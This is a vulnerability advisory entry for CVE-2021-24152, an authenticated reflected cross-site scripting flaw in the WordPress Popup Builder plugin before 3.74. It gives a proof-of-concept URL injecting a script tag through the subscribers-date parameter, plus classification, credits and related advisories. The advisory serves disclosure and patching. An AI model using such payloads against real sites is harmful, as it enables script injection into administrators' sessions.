Popup Builder < 3.74 – Authenticated Reflected Cross-Site Scripting (XSS) | CVE 2021-24152

Description

The "All Subscribers" setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.

Proof of Concept

http://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscribers-date=%22%3E%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E

Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg

Affects Plugins

popup-builder

Fixed in 3.74

References

CVE

CVE-2021-24152

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Original Researcher

Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)

Submitter

Nguyen Anh Tien

Submitter website

https://research.sun-asterisk.com/

Submitter twitter

vigov5

Verified

Yes

WPVDB ID

597e9686-f4e2-43bf-85ef-c5967e5652bd

Timeline

Publicly Published

2021-02-02 (about 4 years ago)

Added

2021-02-02 (about 4 years ago)

Last Updated

2021-02-03 (about 4 years ago)

Other

Published

Title

Published

2024-10-16

Title

ReDi Restaurant Reservation < 24.1015 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Developer Formatter 2013.0.1.40 - devformatter.php Multiple Field XSS

Published

2023-02-06

Title

Arigato Autoresponder and Newsletter < 2.7.1.1 - Unauthenticated Stored XSS

Published

2017-02-24

Title

GD Rating System < 2.1 - XSS

Published

2025-12-15

Title

UseStrict's Calendly Embedder < 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting